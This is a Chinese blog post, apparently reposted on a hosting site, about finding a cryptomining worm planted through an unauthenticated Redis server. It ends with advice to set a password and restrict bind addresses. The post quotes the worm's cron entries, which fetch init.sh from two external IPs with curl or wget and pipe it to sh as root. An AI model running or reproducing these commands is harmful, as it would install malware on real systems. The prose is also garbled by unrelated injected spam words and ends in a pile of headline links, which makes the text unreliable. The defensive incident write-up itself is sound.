前段时间换了台电脑 ,事实证明一大堆开发环境我实在是互联懒得在本地搞了 ,每次启动来启动去太麻烦了 ,惩罚索性直接在服务器上开 Docker 部署 ,裸奔docker pull 复制粘贴什么 Redis、扩散什么 MySQL 分分钟装好,病毒要用的事实证明时候直接远程连接就行了,简直不要太方便 。互联 也不是惩罚什么业务场景让我发现了这么一个病毒 ,亿华云因为大部分 Redis Key 都是裸奔设置了过期时间的 ,开发过程也没感觉到什么问题 ,扩散纯粹是病毒有一天我闲着没事干 ,进入 Redis 命令行 keys * 看看,事实证明不看不要紧 ,互联一看好家伙 ,惩罚多出了几个 key ,大概就是高防服务器下面这样子: 复制uid:1 uid:2 uid:3 backup1 backup2 backup3 backup41.2.3.4.5.6.7.多出了 4 个 backup 前缀的 key ,我第一反应这肯定是什么备份文件 正常情况下我根本不会在意 ,纯粹就是那天确实比较闲,不如来学习下 Redis 吧(哈哈) ,于是,禀着好学的基本素养,模板下载我分别查看了下这里面的 value 是什么: 复制*/2 * * * * root cd1 -fsSL http://194.87.139.103:8080/cleanfda/init.sh | sh */3 * * * * root wget -q -O- http://194.87.139.103:8080/cleanfda/init.sh | sh */4 * * * * root curl -fsSL http://45.83.123.29/cleanfda/init.sh | sh */5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh1.2.3.4.5.6.7.wget 是用来下载东西的,curl 是用于执行 HTTP 请求 ,点开 http://45.83.123.29/cleanfda/init.sh 看看到底是什么脚本文件 :
又是改权限,又是云计算关防火墙删文件的,用屁股想都知道这 IP 肯定是国外的了:
查了下发现这是一种 Redis 扩散病毒 ,专门利用 Redis 未授权访问漏洞的挖矿病毒 。没错,就是 Redis 没设置密码 ,服务器租用没授权,让病毒有了可乘之机。如果服务暴露在互联网上就一定要设置密码 ,不要裸奔 😭,很多同学大部分时间都是在本地开发,没有设置密码的习惯或者只是简单的设置成 root 这种 另外,除了设置密码 ,源码下载服务器开放端口的时候最好也指定下 IP,不然默认的 0.0.0.0:6379 任何 IP 都可以访问 |
如何安全部署和升级服务?大规模DOS攻击利用280万个IP攻击VPN和防火墙登录美国当局追回与2021年Uranium Finance黑客事件相关的3100万美元重新定义客户体验:AI如何改变万事达卡新型越狱攻击可突破 ChatGPT、DeepSeek 等主流AI服务防护Sitecore 零日漏洞可让攻击者远程执行代码深信服秋季新品重磅发布:安全GPT4.0数据安全大模型与分布式存储EDS新版本520,助力数字化更简单、更安全黑客滥用微软 Copilot 发动高仿钓鱼攻击Gartner预测到2027年,跨境GenAI滥用引起的AI数据泄露比例将达到40%如何发现并避免AI引发的骗局亿华云云服务器源码库b2b信息平台企业服务器网站建设香港物理机